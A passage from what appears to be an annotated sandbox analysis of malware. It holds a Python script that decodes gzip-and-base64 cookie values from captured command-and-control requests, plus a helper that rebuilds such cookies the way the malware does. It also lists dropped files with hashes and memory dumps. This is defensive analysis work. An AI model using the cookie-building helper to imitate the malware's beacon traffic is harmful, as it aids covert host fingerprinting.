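CAB41E62C04 values are copied from the captured requests; the Cookie
header built from them and the round-trip sample are constructed.
"""
import base64
import binascii
import gzip
import struct
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # shows up as "H4sI" once base64-encoded

# Captured values: C02 from the first request; C04 from the first
# (20:58:22) and third (20:59:25) requests, which differ.
C02 = ("H4sIAAAAAAAEAAtJrSjxzCsoLfHILy6J881MLsovzk8rUQgBiiuAJRQcCwpyMpMT"
       "SzLz8wBLKcATLgAAAA==")
C04_FIRST = "H4sIAAAAAAAEAHOOMzI2NDM1MTM2NzWzqFF0izMzNDQ0MjYyAADsmH8NGgAAAA=="
C04_THIRD = "H4sIAAAAAAAEAHOOMzI2NDO1sLAwNTQyqFF0izMzNDQ0MjYyAABukmIPGgAAAA=="
# Constructed header in the shape the report shows (cookie names are the report's).
COOKIE_HEADER = f"Cookie: CAB41E62C02={C02}; CAB41E62C04={C04_FIRST}"


def parse_cookie_header(header: str) -> dict[str, str]:
    """'Cookie: a=1; b=2' (or just 'a=1; b=2') -> {'a': '1', 'b': '2'}."""
    body = header.split(":", 1)[1] if header.lower().startswith("cookie:") else header
    pairs = (p.strip().split("=", 1) for p in body.split(";") if "=" in p)
    return {k.strip(): v.strip() for k, v in pairs}


def gzip_trailer(raw: bytes) -> tuple[int, int]:
    """(crc32, isize) from the last 8 bytes of a single-member gzip stream."""
    return struct.unpack("<II", raw[-8:])


def unpack_value(value: str) -> dict:
    """base64 -> gzip -> bytes for one cookie value, tolerating junk input."""
    info = {"gzip": False, "raw_len": None, "isize": None, "data": None}
    try:
        raw = base64.b64decode(value, validate=True)
    except binascii.Error:
        return info
    info["raw_len"] = len(raw)
    if not raw.startswith(GZIP_MAGIC) or len(raw) < 18:   # 10-byte header + 8-byte trailer
        return info
    info["gzip"] = True
    info["isize"] = gzip_trailer(raw)[1]        # declared uncompressed length
    try:
        info["data"] = gzip.decompress(raw)      # also verifies CRC32 and ISIZE
    except (OSError, EOFError, zlib.error):
        pass                                     # keep the trailer facts, no data
    return info


def unpack_cookie_header(header: str) -> dict[str, dict]:
    """Describe every cookie in a header line."""
    return {name: unpack_value(value) for name, value in parse_cookie_header(header).items()}


def make_cookie(values: dict[str, bytes]) -> str:
    """Build a header the same way the stage does: gzip, then base64."""
    parts = [f"{k}={base64.b64encode(gzip.compress(v, mtime=0)).decode()}"
             for k, v in values.items()]
    return "Cookie: " + "; ".join(parts)


if __name__ == "__main__":
    for name, info in unpack_cookie_header(COOKIE_HEADER).items():
        print(f"{name}: gzip={info['gzip']} raw={info['raw_len']}B "
              f"isize={info['isize']} decoded={info['data'] is not None}")
```

    On the captured values the trailer alone says what the content does not need to: CAB41E62C02 declares 46 uncompressed bytes and both CAB41E62C04 variants declare 26, so the field that changes between requests keeps a fixed length while its content changes. The decompressed bytes are deliberately not asserted here, since the page shows only the encoded values; run the block to inspect them, and treat the C0 and C03 values (the longest, several hundred bytes of deflate each) as the host-fingerprint payload worth recovering in an incident.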

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3h4bfgxm.d03.ps1

      A probe file PowerShell writes at startup to test whether script execution is restricted by AppLocker/WDAC; a side-effect of the PowerShell stage, not a payload.

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Adobe\PATIEN~1.JS

      Filesize

      40.7MB

      MD5

      9de919c580b48e595c457e48b127b613

      SHA1

      d2d7b625ec9cd317747ad5d4c2d5394c0b417c3b

      SHA256

      59b5f631686fdf4a548a3709afebbd0319cfef177b3ba031c0607e54a23c61b5

      SHA512

      85f0e8c6e398e5d714c7d3e51eaa144e5cfcf749361ce446b0ca1dac5794e45ba04ee70b0a5895672a5e5808fc34049db72a270a7511f9932c5a4193ff97a6f9

    • memory/1052-12-0x0000029BEBB40000-0x0000029BEBB62000-memory.dmp

      Filesize

      136KB

    • memory/1052-13-0x0000029BEBF40000-0x0000029BEBF84000-memory.dmp

      Filesize

      272KB

    • memory/1052-14-0x0000029BEC010000-0x0000029BEC086000-memory.dmp

      Filesize

      472KB

    • memory/1052-15-0x0000029BEC260000-0x0000029BEC28A000-memory.dmp

      Filesize

      168KB

    • memory/1052-16-0x0000029BEC260000-0x0000029BEC284000-memory.dmp

      Filesize

      144KB
